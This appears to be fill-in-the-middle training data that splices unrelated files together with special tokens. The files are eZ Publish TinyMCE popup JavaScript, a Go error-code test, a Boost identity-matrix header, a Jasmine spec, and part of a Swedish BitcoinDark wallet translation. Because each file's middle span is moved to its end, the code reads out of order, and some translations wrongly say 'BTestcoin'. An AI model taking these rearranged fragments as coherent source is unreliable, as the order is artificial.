if ( name === 'class' )
v = jQuery.trim( cssReplace( editorElement.className ) );
else {
v = tinyMCEPopup.editor.dom.getAttrib( editorElement, name );
if ( !v && tinymce.DOM.getAttrib(editorElement, 'style') && editorElement.style[name.toLowerCase()] ) {
v = editorElement.style[name.toLowerCase()];
}
}
if ( v !== false && v !== null && v !== undefined )
{
if ( handler[el.id] !== undefined && handler[el.id].call !== undefined )
handler[el.id].call( o, el, v );
else if ( el.type === 'checkbox' )
el.checked = v == el.value;
else if ( el.type === 'select-one' )
{
// Make sure selection has value before we set it (#014986)
for( var i = 0, l = el.options.length; i < l; i++ )
{
if ( el.options[i].value == v ) el.value = v;
}
}
else
el.value = v;
try {
el.onchange();
} catch (ex) {
// Try fire event, ignore errors
}
}
});
},
switchTagTypeIfNeeded: function ( currentNode, targetTag )
{
if ( currentNode && currentNode.nodeName && targetTag !== currentNode.nodeName.toLowerCase() )
{
// changing to a different node type
var ed = tinyMCEPopup.editor, doc = ed.getDoc(), newNode = doc.createElement( targetTag );
// copy children
if ( newNode.nodeName !== 'IMG' )
{
for ( var c = 0; c < currentNode.childNodes.length; c++ )
newNode.appendChild( currentNode.childNodes[c].cloneNode(1) );
}
// copy attributes
for ( var a = 0; a < currentNode.attributes.length; a++ )
ed.dom.setAttrib(newNode, currentNode.attributes[a].name, ed.dom.getAttrib( currentNode, currentNode.attributes[a].name ) );
if ( currentNode.parentNode.nodeName === 'BODY'
&& ( newNode.nodeName === 'SPAN' || newNode.nodeName === 'IMG' )
)
{
// replace node but wrap inside a paragraph first
var p = doc.createElement('p');
p.appendChild( newNode );
currentNode.parentNode.replaceChild( p, currentNode );
}
else
{
// replace node
currentNode.parentNode.replaceChild( newNode, currentNode );
}
return newNode;
}
return currentNode;
},
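    // Usage sketch (hypothetical nodes): convert the current strong element
    // to em, keeping children and attributes:
    //   var em = eZOEPopupUtils.switchTagTypeIfNeeded( strongNode, 'em' );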
selectByEmbedId: function( id, node_id, name, useNode )
{
// redirects to embed window of a specific object id
// global objects: ez
if ( id !== undefined )
{
var s = tinyMCEPopup.editor.settings, type = useNode === true && node_id > 0 ? 'eZNode_' + node_id : 'eZObject_' + id ;
window.location = s.ez_extension_url + '/relations/' + s.ez_contentobject_id + '/' + s.ez_contentobject_version + '/auto/' + type;
}
},
BIND: function()
{
        // Binds arguments to a function, so when you call the returned wrapper function,
        // the original arguments are intact and arguments passed to the wrapper function are appended.
        // first argument is the function, second is 'this' and the rest is arguments
var __args = Array.prototype.slice.call( arguments ), __fn = __args.shift(), __obj = __args.shift();
return function(){return __fn.apply( __obj, __args.concat( Array.prototype.slice.call( arguments ) ) )};
},
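    // Usage sketch (hypothetical callback fn and object someObj):
    //   var cb = eZOEPopupUtils.BIND( fn, someObj, 'a' );
    //   cb( 'b' ); // invokes fn.call( someObj, 'a', 'b' )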
searchEnter: function( e, isButton )
{
// post search form if enter key is pressed or isButton = true
if ( isButton )
{
eZOEPopupUtils.search();
return false;
}
e = e || window.event;
        var key = e.which || e.keyCode;
if ( key == 13)
{
eZOEPopupUtils.search(); // enter key
return false;
}
return true;
},
browse: function( nodeId, offset )
{
        // browse for a specific node id and an offset on the child elements
var postData = eZOEPopupUtils.jqSafeSerilizer('browse_box'), o = offset ? offset : 0;
jQuery.ez('ezoe::browse::' + nodeId + '::' + o, postData, function( data ){ eZOEPopupUtils.browseCallBack( data, 'browse' ) } );
jQuery('#browse_progress' ).show();
},
search: function( offset )
{
        // search for nodes with input and select form elements inside a 'search_box' container element
if ( jQuery.trim( jQuery('#SearchText').val() ) )
{
var postData = eZOEPopupUtils.jqSafeSerilizer('search_box'), o = offset ? offset : 0;
jQuery.ez('ezjsc::search::x::' + o, postData, eZOEPopupUtils.searchCallBack );
jQuery('#search_progress' ).show();
}
},
jqSafeSerilizer: function( id )
{
        // jQuery url-encodes form names (incl []) if you pass an object / array to it; avoid that by building a plain string
var postData = '', val;
jQuery.each( jQuery('#' + id + ' input, #' + id + ' select').serializeArray(), function(i, o){
if ( o.value )
postData += ( postData ? '&' : '') + o.name + '=' + o.value;
});
return postData;
},
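    // Example (hypothetical form content): an <input name="SearchText"
    // value="foo"> inside the given container serializes to 'SearchText=foo',
    // keeping the field name unencoded.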
browseCallBack: function( data, mode, emptyCallBack )
{
        // callback function for the browse() ajax call; generates the html markup with paging and path header (if defined)
mode = mode ? mode : 'browse';
jQuery('#' + mode + '_progress' ).hide();
var ed = tinyMCEPopup.editor, tbody = jQuery('#' + mode + '_box_prev tbody')[0], thead = jQuery('#' + mode + '_box_prev thead')[0], tfoot = jQuery('#' + mode + '_box_prev tfoot')[0], tr, td, tag, hasImage, emptyList = true;
eZOEPopupUtils.removeChildren( tbody );
eZOEPopupUtils.removeChildren( thead );
eZOEPopupUtils.removeChildren( tfoot );
if ( data && data.content !== '' )
{
var fn = mode + ( mode === 'browse' ? '('+ data.content['node']['node_id'] + ',' : '(' );
var classGenerator = eZOEPopupUtils.settings.browseClassGenerator, linkGenerator = eZOEPopupUtils.settings.browseLinkGenerator;
if ( data.content['node'] && data.content['node']['name'] )
{
tr = document.createElement("tr"), td = document.createElement("td");
tr.className = 'browse-path-list';
td.className = 'thight';
tr.appendChild( td );
td = document.createElement("td")
td.setAttribute('colspan', '3');
if ( data.content['node']['path'] !== false && data.content['node']['node_id'] != 1 )
{
// Prepend root node so you can browse to the root of the installation
data.content['node']['path'].splice(0,0,{'node_id':1, 'name': ed.getLang('ez.root_node_name'), 'class_name': 'Folder'});
jQuery.each( data.content['node']['path'], function( i, n )
{
tag = document.createElement("a");
tag.setAttribute('href', 'JavaScript:eZOEPopupUtils.' + mode + '(' + n.node_id + ');');
tag.setAttribute('title', ed.getLang('advanced.type') + ': ' + n.class_name );
tag.innerHTML = n.name;
td.appendChild( tag );
tag = document.createElement("span");
tag.innerHTML = ' / ';
td.appendChild( tag );
});
}
tag = document.createElement("span");
tag.innerHTML = data.content['node']['name'];
td.appendChild( tag );
tr.appendChild( td );
thead.appendChild( tr );
}
if ( data.content['list'] )
{
jQuery.each( data.content['list'], function( i, n )
{
tr = document.createElement("tr"), td = document.createElement("td"), tag = document.createElement("input"), isImage = false;
tag.setAttribute('type', 'radio');
tag.setAttribute('name', 'selectembedobject');
tag.className = 'input_noborder';
tag.setAttribute('value', n.contentobject_id);
tag.setAttribute('title', ed.getLang('advanced.select') );
tag.onclick = eZOEPopupUtils.BIND( eZOEPopupUtils.selectByEmbedId, eZOEPopupUtils, n.contentobject_id, n.node_id, n.name );
td.appendChild( tag );
td.className = 'thight';
tr.appendChild( td );
td = document.createElement("td");
if ( linkGenerator.call !== undefined )
{
tag = linkGenerator.call( this, n, mode, ed );
}
else if ( n.children_count )
{
tag = document.createElement("a");
tag.setAttribute('href', 'JavaScript:eZOEPopupUtils.' + mode + '(' + n.node_id + ');');
tag.setAttribute('title', ed.getLang('browse') + ': ' + n.url_alias );
}
else
{
tag = document.createElement("span");
tag.setAttribute('title', n.url_alias );
}
tag.innerHTML = n.name;
td.appendChild( tag );
tr.appendChild( td );
td = document.createElement("td");
tag = document.createElement("span");
tag.innerHTML = n.class_name;
td.appendChild( tag );
tr.appendChild( td );
td = document.createElement("td");
var imageIndex = eZOEPopupUtils.indexOfImage( n, eZOEPopupUtils.settings.browseImageAlias );
if ( imageIndex !== -1 )
{
tag = document.createElement("span");
tag.className = 'image_preview';
                        var previewUrl = ed.settings.ez_root_url + encodeURI( n.data_map[ n.image_attributes[imageIndex] ].content[eZOEPopupUtils.settings.browseImageAlias].url );
tag.innerHTML += ' <a href="#">' + ed.getLang('preview.preview_desc') + '<img src="' + previewUrl + '" /></a>';<|fim▁hole|> }
tr.appendChild( td );
tr.className = classGenerator.call( this, n, hasImage, ed );
tbody.appendChild( tr );
emptyList = false;
} );
}
        // Make sure int params that need to be subtracted/added are native ints
var offset = eZOEPopupUtils.Int( data.content['offset'] ), limit = eZOEPopupUtils.Int( data.content['limit'] );
tr = document.createElement("tr"), td = document.createElement("td");
tr.appendChild( document.createElement("td") );
if ( offset > 0 )
{
tag = document.createElement("a");
tag.setAttribute('href', 'JavaScript:eZOEPopupUtils.' + fn + (offset - limit) + ');');
tag.innerHTML = '<< ' + ed.getLang('advanced.previous');
td.appendChild( tag );
}
tr.appendChild( td );
td = document.createElement("td");
td.setAttribute('colspan', '2');
if ( (offset + limit) < data.content['total_count'] )
{
tag = document.createElement("a");
tag.setAttribute('href', 'JavaScript:eZOEPopupUtils.' + fn + (offset + limit) + ');');
tag.innerHTML = ed.getLang('advanced.next') + ' >>';
td.appendChild( tag );
}
tr.appendChild( td );
tfoot.appendChild( tr );
}
if ( emptyList && emptyCallBack !== undefined && emptyCallBack.call !== undefined )
{
emptyCallBack.call( this, tbody, mode, ed );
}
return false;
},
searchCallBack : function( searchData )
{
// wrapper function for browseCallBack, called by ajax call in search()
var data = { 'content': '' };
if ( searchData && searchData.content !== '' )
{
data['content'] = {
'limit': searchData.content.SearchLimit,
'offset': searchData.content.SearchOffset,
'total_count': searchData.content.SearchCount,
'list': searchData.content.SearchResult
};
}
return eZOEPopupUtils.browseCallBack( data, 'search', function( tbody, mode, ed ){
// callback for use when result is empty
var tr = document.createElement("tr"), td = document.createElement("td"), tag = document.createElement("span");
tr.appendChild( document.createElement("td") );
tr.className = 'search-result-empty';
td.setAttribute('colspan', '3');
tag.innerHTML = ed.getLang('ez.empty_search_result').replace('<search_string>', jQuery('#SearchText').val() );
td.appendChild( tag );
tr.appendChild( td );
tbody.appendChild( tr );
} );
},
indexOfImage: function( jsonNode, alias )
{
if ( !alias ) alias = eZOEPopupUtils.settings.browseImageAlias;
var index = -1;
jQuery.each( jsonNode.image_attributes, function( i, attr )
{
if ( index === -1 && jsonNode.data_map[ attr ] && jsonNode.data_map[ attr ].content[ alias ] )
index = i;
});
return index;
},
// some reusable functions from ezcore
ie65: /MSIE [56]/.test( navigator.userAgent ),
Int: function(value, fallBack)
{
        // Checks if value is an int; if not, fallBack or 0 is returned
value = parseInt( value );
return isNaN( value ) ? ( fallBack !== undefined ? fallBack : 0 ) : value;
},
Float: function(value, fallBack)
{
        // Checks if value is a float; if not, fallBack or 0 is returned
value = parseFloat( value );
return isNaN( value ) ? ( fallBack !== undefined ? fallBack : 0 ) : value;
},
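    // Usage sketch: eZOEPopupUtils.Int( '42px' ) === 42,
    // eZOEPopupUtils.Int( 'abc', -1 ) === -1 and
    // eZOEPopupUtils.Float( '1.5' ) === 1.5; fallBack only applies when
    // parsing yields NaN.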
min: function()
{
// Returns the lowest number, or null if none
var min = null;
for (var i = 0, a = arguments, l = a.length; i < l; i++)
if (min === null || min > a[i]) min = a[i];
return min;
}
};<|fim▁end|> | td.appendChild( tag );
hasImage = true; |
<|file_name|>errors_test.go<|end_file_name|><|fim▁begin|>// Copyright 2012, 2013 Canonical Ltd.
// Licensed under the AGPLv3, see LICENCE file for details.
package common_test
import (
stderrors "errors"
jc "github.com/juju/testing/checkers"
gc "launchpad.net/gocheck"
"github.com/wallyworld/core/errors"
"github.com/wallyworld/core/state"
"github.com/wallyworld/core/state/api/params"
"github.com/wallyworld/core/state/apiserver/common"
"github.com/wallyworld/core/testing/testbase"
)
type errorsSuite struct {
testbase.LoggingSuite
}
var _ = gc.Suite(&errorsSuite{})
var errorTransformTests = []struct {
err error
code string
helperFunc func(error) bool
}{{
err: errors.NotFoundf("hello"),
code: params.CodeNotFound,
helperFunc: params.IsCodeNotFound,
}, {
err: errors.Unauthorizedf("hello"),
code: params.CodeUnauthorized,
helperFunc: params.IsCodeUnauthorized,
}, {
err: state.ErrCannotEnterScopeYet,
code: params.CodeCannotEnterScopeYet,
helperFunc: params.IsCodeCannotEnterScopeYet,
}, {
err: state.ErrCannotEnterScope,
code: params.CodeCannotEnterScope,
helperFunc: params.IsCodeCannotEnterScope,
}, {
err: state.ErrExcessiveContention,
code: params.CodeExcessiveContention,
helperFunc: params.IsCodeExcessiveContention,
}, {
err: state.ErrUnitHasSubordinates,
code: params.CodeUnitHasSubordinates,
helperFunc: params.IsCodeUnitHasSubordinates,
}, {
err: common.ErrBadId,
code: params.CodeNotFound,
helperFunc: params.IsCodeNotFound,
}, {
err: common.NoAddressSetError("unit-mysql-0", "public"),
code: params.CodeNoAddressSet,
helperFunc: params.IsCodeNoAddressSet,
}, {
err: common.ErrBadCreds,
code: params.CodeUnauthorized,
helperFunc: params.IsCodeUnauthorized,
}, {
err: common.ErrPerm,
code: params.CodeUnauthorized,
helperFunc: params.IsCodeUnauthorized,
}, {
err: common.ErrNotLoggedIn,
code: params.CodeUnauthorized,
helperFunc: params.IsCodeUnauthorized,
}, {
err: state.NotProvisionedError("0"),
code: params.CodeNotProvisioned,
helperFunc: params.IsCodeNotProvisioned,
}, {
err: errors.AlreadyExistsf("blah"),
code: params.CodeAlreadyExists,
helperFunc: params.IsCodeAlreadyExists,
}, {
err: common.ErrUnknownWatcher,
code: params.CodeNotFound,
helperFunc: params.IsCodeNotFound,
}, {
err: &state.NotAssignedError{&state.Unit{}}, // too sleazy?! nah..
code: params.CodeNotAssigned,
helperFunc: params.IsCodeNotAssigned,
}, {
err: common.ErrStoppedWatcher,
code: params.CodeStopped,
helperFunc: params.IsCodeStopped,
}, {
err: &state.HasAssignedUnitsError{"42", []string{"a"}},
code: params.CodeHasAssignedUnits,
helperFunc: params.IsCodeHasAssignedUnits,
}, {
err: common.ErrTryAgain,
code: params.CodeTryAgain,
helperFunc: params.IsCodeTryAgain,
}, {
err: stderrors.New("an error"),
code: "",
}, {
err: unhashableError{"foo"},
code: "",
}, {
err: nil,
code: "",
}}
type unhashableError []string
func (err unhashableError) Error() string {
return err[0]
}
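// unhashableError has a slice underlying type, so its values are not
// comparable and cannot be used as map keys; the test table presumably uses
// it to check that common.ServerError copes with such errors.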
func (s *errorsSuite) TestErrorTransform(c *gc.C) {
for _, t := range errorTransformTests {
err1 := common.ServerError(t.err)
if t.err == nil {
c.Assert(err1, gc.IsNil)
} else {
c.Assert(err1.Message, gc.Equals, t.err.Error())
c.Assert(err1.Code, gc.Equals, t.code)
if t.helperFunc != nil {
c.Assert(err1, jc.Satisfies, t.helperFunc)<|fim▁hole|>}<|fim▁end|> | }
}
} |
<|file_name|>identity_matrix.hpp<|end_file_name|><|fim▁begin|>//Copyright (c) 2008-2009 Emil Dotchevski and Reverge Studios, Inc.
//Distributed under the Boost Software License, Version 1.0. (See accompanying
//file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
#ifndef UUID_D6250026A17F11DEA29012BF55D89593
#define UUID_D6250026A17F11DEA29012BF55D89593
#include <boost/la/config.hpp>
#include <boost/la/deduce_matrix.hpp>
#include <boost/assert.hpp>
#include <boost/static_assert.hpp>
namespace
boost
{
namespace
la
{
namespace
la_detail
{
template <class T,int Dim>
class
identity_matrix_
{
identity_matrix_( identity_matrix_ const & );
identity_matrix_ & operator=( identity_matrix_ const & );
~identity_matrix_();
public:
template <class R>
BOOST_LA_INLINE_TRIVIAL
operator R() const
{
R r;
assign(r,*this);
return r;
}
};
}
template <class Matrix>
struct matrix_traits;
template <class T,int Dim>
struct
matrix_traits< la_detail::identity_matrix_<T,Dim> >
{
typedef la_detail::identity_matrix_<T,Dim> this_matrix;
typedef T scalar_type;
static int const rows=Dim;
static int const cols=Dim;
template <int Row,int Col>
static
BOOST_LA_INLINE_CRITICAL
scalar_type
r( this_matrix const & x )
{
BOOST_ASSERT(&x==0);
BOOST_STATIC_ASSERT(Row>=0);
BOOST_STATIC_ASSERT(Row<Dim);
BOOST_STATIC_ASSERT(Col>=0);
BOOST_STATIC_ASSERT(Col<Dim);
return scalar_type(Row==Col);
}
static
BOOST_LA_INLINE_CRITICAL
scalar_type
ir( int row, int col, this_matrix const & x )
{
BOOST_ASSERT(&x==0);
BOOST_ASSERT(row>=0);
BOOST_ASSERT(row<Dim);
BOOST_ASSERT(col>=0);
BOOST_ASSERT(col<Dim);
return scalar_type(row==col);
}
};
template <class T,int Dim,int R,int C,class S>
struct
deduce_matrix<la_detail::identity_matrix_<T,Dim>,R,C,S>
{
typedef mat<S,R,C> type;
};
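        //Usage sketch (hypothetical, not part of the original header):
        //  boost::la::mat<float,3,3> m = identity_matrix<float,3>();
        //identity_matrix_<T,Dim> carries no data; its matrix_traits yield 1 on
        //the diagonal and 0 elsewhere, and the conversion operator copies those
        //values into the target type via assign().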
<|fim▁hole|> identity_matrix()
{
return *(la_detail::identity_matrix_<T,Dim> const *)0;
}
}
}
#endif<|fim▁end|> | template <class T,int Dim>
BOOST_LA_INLINE_TRIVIAL
la_detail::identity_matrix_<T,Dim> const & |
<|file_name|>index-spec.6.js<|end_file_name|><|fim▁begin|>/**<|fim▁hole|> * @author Adam Meadows <[email protected]>
* @copyright 2015 Adam Meadows. All rights reserved.
*/
'use strict';
/* eslint-disable max-nested-callbacks */
let $ = require('jquery');
let main = require('aiw-ui');
describe('main', () => {
let $container;
beforeEach(() => {
$container = $('<div/>');
main.render($container[0]);
});
it('renders template', () => {
expect($('.main p', $container)).toHaveText('This is my first webpack project!');
});
});<|fim▁end|> | |
<|file_name|>bitcoin_sv.ts<|end_file_name|><|fim▁begin|><?xml version="1.0" ?><!DOCTYPE TS><TS language="sv" version="2.1">
<context>
<name>AboutDialog</name>
<message>
<location filename="../forms/aboutdialog.ui" line="+14"/>
<source>About BitcoinDark</source>
<translation>Vad du behöver veta om BTestcoin</translation>
</message>
<message>
<location line="+39"/>
<source><b>BitcoinDark</b> version</source>
<translation><b>BitcoinDark</b> version</translation>
</message>
<message>
<location line="+41"/>
<source>Copyright © 2009-2014 The Bitcoin developers
Copyright © 2012-2014 The NovaCoin developers
Copyright © 2014 The BitcoinDark developers</source>
<translation>Copyright © 2009-2014 The Bitcoin developers
Copyright © 2012-2014 The NovaCoin developers
Copyright © 2014 The BitcoinDark developers</translation>
</message>
<message>
<location line="+15"/>
<source>
This is experimental software.
Distributed under the MIT/X11 software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php.
This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/) and cryptographic software written by Eric Young ([email protected]) and UPnP software written by Thomas Bernard.</source>
<translation>
Detta är experimentell mjukvara.
Distribuerad under mjukvarulicensen MIT/X11, se den medföljande filen COPYING eller http://www.opensource.org/licenses/mit-license.php.
Denna produkten innehåller mjukvara utvecklad av OpenSSL Project för användning i OpenSSL Toolkit (http://www.openssl.org/) och kryptografisk mjukvara utvecklad av Eric Young ([email protected]) samt UPnP-mjukvara skriven av Thomas Bernard.</translation>
</message>
</context>
<context>
<name>AddressBookPage</name>
<message>
<location filename="../forms/addressbookpage.ui" line="+14"/>
<source>Address Book</source>
<translation>Adressbok</translation>
</message>
<message>
<location line="+22"/>
<source>Double-click to edit address or label</source>
<translation>Dubbel-klicka för att ändra adressen eller etiketten</translation>
</message>
<message>
<location line="+27"/>
<source>Create a new address</source>
<translation>Skapa ny adress</translation>
</message>
<message>
<location line="+14"/>
<source>Copy the currently selected address to the system clipboard</source>
<translation>Kopiera den markerade adressen till systemets Urklipp</translation>
</message>
<message>
<location line="-11"/>
<source>&New Address</source>
<translation>Ny adress</translation>
</message>
<message>
<location line="-46"/>
<source>These are your BitcoinDark addresses for receiving payments. You may want to give a different one to each sender so you can keep track of who is paying you.</source>
<translation>Dessa är dina BitcoinDark adesser för att mottaga betalningsförsändelser. Du kan även använda olika adresser för varje avsändare för att enkelt hålla koll på vem som har skickat en betalning.</translation>
</message>
<message>
<location line="+60"/>
<source>&Copy Address</source>
<translation>&Kopiera adress</translation>
</message>
<message>
<location line="+11"/>
<source>Show &QR Code</source>
<translation>Visa &QR kod</translation>
</message>
<message>
<location line="+11"/>
<source>Sign a message to prove you own a BitcoinDark address</source>
<translation>Signera ett meddelande för att bevisa att du äger BitcoinDark adressen</translation>
</message>
<message>
<location line="+3"/>
<source>Sign &Message</source>
<translation>Signera &Meddelande</translation>
</message>
<message>
<location line="+25"/>
<source>Delete the currently selected address from the list</source>
<translation>Ta bort den valda adressen från listan</translation>
</message>
<message>
<location line="-14"/>
<source>Verify a message to ensure it was signed with a specified BitcoinDark address</source>
<translation>Verifiera ett meddelande för att försäkra dig över att det var signerat av en specifik BitcoinDark adress</translation>
</message>
<message>
<location line="+3"/>
<source>&Verify Message</source>
<translation>&Verifiera meddelande</translation>
</message>
<message>
<location line="+14"/>
<source>&Delete</source>
<translation>&Radera</translation>
</message>
<message>
<location filename="../addressbookpage.cpp" line="+65"/>
<source>Copy &Label</source>
<translation>Kopiera &etikett</translation>
</message>
<message>
<location line="+2"/>
<source>&Edit</source>
<translation>&Editera</translation>
</message>
<message>
<location line="+250"/>
<source>Export Address Book Data</source>
<translation>Exportera adressboken</translation>
</message>
<message>
<location line="+1"/>
<source>Comma separated file (*.csv)</source>
<translation>Kommaseparerad fil (*.csv)</translation>
</message>
<message>
<location line="+13"/>
<source>Error exporting</source>
<translation>Exportera felmeddelanden</translation>
</message>
<message>
<location line="+0"/>
<source>Could not write to file %1.</source>
<translation>Kunde inte skriva till fil %1</translation>
</message>
</context>
<context>
<name>AddressTableModel</name>
<message>
<location filename="../addresstablemodel.cpp" line="+144"/>
<source>Label</source>
<translation>Etikett</translation>
</message>
<message>
<location line="+0"/>
<source>Address</source>
<translation>Adress</translation>
</message>
<message>
<location line="+36"/>
<source>(no label)</source>
<translation>(Ingen etikett)</translation>
</message>
</context>
<context>
<name>AskPassphraseDialog</name>
<message>
<location filename="../forms/askpassphrasedialog.ui" line="+26"/>
<source>Passphrase Dialog</source>
<translation>Lösenords Dialog</translation>
</message>
<message>
<location line="+21"/>
<source>Enter passphrase</source>
<translation>Ange lösenord</translation>
</message>
<message>
<location line="+14"/>
<source>New passphrase</source>
<translation>Nytt lösenord</translation>
</message>
<message>
<location line="+14"/>
<source>Repeat new passphrase</source>
<translation>Upprepa nytt lösenord</translation>
</message>
<message>
<location line="+33"/>
<source>Serves to disable the trivial sendmoney when OS account compromised. Provides no real security.</source>
<translation>Avaktiverar "sendmoney" om ditt operativsystem har blivit äventyrat. ger ingen verklig säkerhet.</translation>
</message>
<message>
<location line="+3"/>
<source>For staking only</source>
<translation>Endast för "staking"</translation>
</message>
<message>
<location filename="../askpassphrasedialog.cpp" line="+35"/>
<source>Enter the new passphrase to the wallet.<br/>Please use a passphrase of <b>10 or more random characters</b>, or <b>eight or more words</b>.</source>
<translation>Ange plånbokens nya lösenord. <br/> Använd ett lösenord på <b>10 eller fler slumpmässiga tecken,</b> eller <b>åtta eller fler ord.</b></translation>
</message>
<message>
<location line="+1"/>
<source>Encrypt wallet</source>
<translation>Kryptera plånbok</translation>
</message>
<message>
<location line="+7"/>
<source>This operation needs your wallet passphrase to unlock the wallet.</source>
<translation>Denna operation behöver din plånboks lösenord för att låsa upp plånboken.</translation>
</message>
<message>
<location line="+5"/>
<source>Unlock wallet</source>
<translation>Lås upp plånbok</translation>
</message>
<message>
<location line="+3"/>
<source>This operation needs your wallet passphrase to decrypt the wallet.</source>
<translation>Denna operation behöver din plånboks lösenord för att dekryptera plånboken.</translation>
</message>
<message>
<location line="+5"/>
<source>Decrypt wallet</source>
<translation>Dekryptera plånbok</translation>
</message>
<message>
<location line="+3"/>
<source>Change passphrase</source>
<translation>Ändra lösenord</translation>
</message>
<message>
<location line="+1"/>
<source>Enter the old and new passphrase to the wallet.</source>
<translation>Ange plånbokens gamla och nya lösenord.</translation>
</message>
<message>
<location line="+46"/>
<source>Confirm wallet encryption</source>
<translation>Bekräfta kryptering av plånbok</translation>
</message>
<message>
<location line="+1"/>
<source>Warning: If you encrypt your wallet and lose your passphrase, you will <b>LOSE ALL OF YOUR COINS</b>!</source>
<translation>Varning: Om du krypterar plånboken och glömmer lösenordet, kommer du att <b>FÖRLORA ALLA COINS</b>!</translation>
</message>
<message>
<location line="+0"/>
<source>Are you sure you wish to encrypt your wallet?</source>
<translation>Är du säker på att du vill kryptera din plånbok?</translation>
</message>
<message>
<location line="+15"/>
<source>IMPORTANT: Any previous backups you have made of your wallet file should be replaced with the newly generated, encrypted wallet file. For security reasons, previous backups of the unencrypted wallet file will become useless as soon as you start using the new, encrypted wallet.</source>
<translation>VIKTIGT: Alla tidigare säkerhetskopior du har gjort av plånbokens fil ska ersättas med den nya genererade, krypterade plånboks filen. Av säkerhetsskäl kommer tidigare säkerhetskopior av den okrypterade plånboks filen blir oanvändbara när du börjar använda en ny, krypterad plånbok.</translation>
</message>
<message>
<location line="+103"/>
<location line="+24"/>
<source>Warning: The Caps Lock key is on!</source>
<translation>Varning: Caps Lock är påslaget!</translation>
</message>
<message>
<location line="-133"/>
<location line="+60"/>
<source>Wallet encrypted</source>
<translation>Plånboken är krypterad</translation>
</message>
<message>
<location line="-58"/>
<source>BitcoinDark will close now to finish the encryption process. Remember that encrypting your wallet cannot fully protect your coins from being stolen by malware infecting your computer.</source>
<translation>BTestcoin plånboken kommer nu att stängas för att slutföra krypteringen: Kom ihåg att även en krypterad plånboks säkerhet kan äventyras genom keyloggers eller dylika malwares.</translation>
</message>
<message>
<location line="+13"/>
<location line="+7"/>
<location line="+44"/>
<location line="+6"/>
<source>Wallet encryption failed</source>
<translation>Kryptering av plånbok misslyckades</translation>
</message>
<message>
<location line="-56"/>
<source>Wallet encryption failed due to an internal error. Your wallet was not encrypted.</source>
<translation>Kryptering av plånbok misslyckades på grund av ett internt fel. Din plånbok blev inte krypterad.</translation>
</message>
<message>
<location line="+7"/>
<location line="+50"/>
<source>The supplied passphrases do not match.</source>
<translation>De angivna lösenorden överensstämmer inte.</translation>
</message>
<message>
<location line="-38"/>
<source>Wallet unlock failed</source>
<translation>Upplåsning av plånbok misslyckades</translation>
</message>
<message>
<location line="+1"/>
<location line="+12"/>
<location line="+19"/>
<source>The passphrase entered for the wallet decryption was incorrect.</source>
<translation>Lösenordet för dekryptering av plånbok var felaktig.</translation>
</message>
<message>
<location line="-20"/>
<source>Wallet decryption failed</source>
<translation>Dekryptering av plånbok misslyckades</translation>
</message>
<message>
<location line="+14"/>
<source>Wallet passphrase was successfully changed.</source>
<translation>Plånbokens lösenord har ändrats.</translation>
</message>
</context>
<context>
<name>BitcoinGUI</name>
<message>
<location filename="../bitcoingui.cpp" line="+280"/>
<source>Sign &message...</source>
<translation>Signera &meddelande...</translation>
</message>
<message>
<location line="+242"/>
<source>Synchronizing with network...</source>
<translation>Synkroniserar med nätverk...</translation>
</message>
<message>
<location line="-308"/>
<source>&Overview</source>
<translation>&Översikt</translation>
</message>
<message>
<location line="+1"/>
<source>Show general overview of wallet</source>
<translation>Visa översiktsvy av plånbok</translation>
</message>
<message>
<location line="+17"/>
<source>&Transactions</source>
<translation>&Transaktioner</translation>
</message>
<message>
<location line="+1"/>
<source>Browse transaction history</source>
<translation>Bläddra i transaktionshistorik</translation>
</message>
<message>
<location line="+5"/>
<source>&Address Book</source>
<translation>&Adress bok</translation>
</message>
<message>
<location line="+1"/>
<source>Edit the list of stored addresses and labels</source>
<translation>Editera listan över sparade adresser och deras namn</translation>
</message>
<message>
<location line="-13"/>
<source>&Receive coins</source>
<translation>&Ta emot coins</translation>
</message>
<message>
<location line="+1"/>
<source>Show the list of addresses for receiving payments</source>
<translation>Visa adresslista för att mottaga betalningar</translation>
</message>
<message>
<location line="-7"/>
<source>&Send coins</source>
<translation>&Skicka coins</translation>
</message>
<message>
<location line="+35"/>
<source>E&xit</source>
<translation>&Avsluta</translation>
</message>
<message>
<location line="+1"/>
<source>Quit application</source>
<translation>Avsluta programmet</translation>
</message>
<message>
<location line="+4"/>
<source>Show information about BitcoinDark</source>
<translation>Visa information om BitcoinDark</translation>
</message>
<message>
<location line="+2"/>
<source>About &Qt</source>
<translation>Om &Qt</translation>
</message>
<message>
<location line="+1"/>
<source>Show information about Qt</source>
<translation>Visa information om Qt</translation>
</message>
<message>
<location line="+2"/>
<source>&Options...</source>
<translation>&Alternativ...</translation>
</message>
<message>
<location line="+4"/>
<source>&Encrypt Wallet...</source>
<translation>&Kryptera plånbok...</translation>
</message>
<message>
<location line="+3"/>
<source>&Backup Wallet...</source>
<translation>&Säkerhetskopiera plånbok...</translation>
</message>
<message>
<location line="+2"/>
<source>&Change Passphrase...</source>
<translation>&Byt Lösenord...</translation>
</message>
<message numerus="yes">
<location line="+250"/>
<source>~%n block(s) remaining</source>
<translation><numerusform>~%n block remaining</numerusform><numerusform>~%n block kvar</numerusform></translation>
</message>
<message>
<location line="+6"/>
<source>Downloaded %1 of %2 blocks of transaction history (%3% done).</source>
<translation>Laddat ner %1 av %2 block av transaktions-historiken (%3% klart)</translation>
</message>
<message>
<location line="-247"/>
<source>&Export...</source>
<translation>&Exportera...</translation>
</message>
<message>
<location line="-62"/>
<source>Send coins to a BitcoinDark address</source>
<translation>Skicka coins till en BitcoinDark adress</translation>
</message>
<message>
<location line="+45"/>
<source>Modify configuration options for BitcoinDark</source>
<translation>Modifiera konfigurations-alternativ för BitcoinDark</translation>
</message>
<message>
<location line="+18"/>
<source>Export the data in the current tab to a file</source>
<translation>Exportera datan i tabben till en fil</translation>
</message>
<message>
<location line="-14"/>
<source>Encrypt or decrypt wallet</source>
<translation>Kryptera eller avkryptera plånbok</translation>
</message>
<message>
<location line="+3"/>
<source>Backup wallet to another location</source>
<translation>Säkerhetskopiera plånboken till en annan plats</translation>
</message>
<message>
<location line="+2"/>
<source>Change the passphrase used for wallet encryption</source>
<translation>Byt lösenord för kryptering av plånbok</translation>
</message>
<message>
<location line="+10"/>
<source>&Debug window</source>
<translation>&Debug fönster</translation>
</message>
<message>
<location line="+1"/>
<source>Open debugging and diagnostic console</source>
<translation>Öppna debug- och diagnostikkonsolen</translation>
</message>
<message>
<location line="-5"/>
<source>&Verify message...</source>
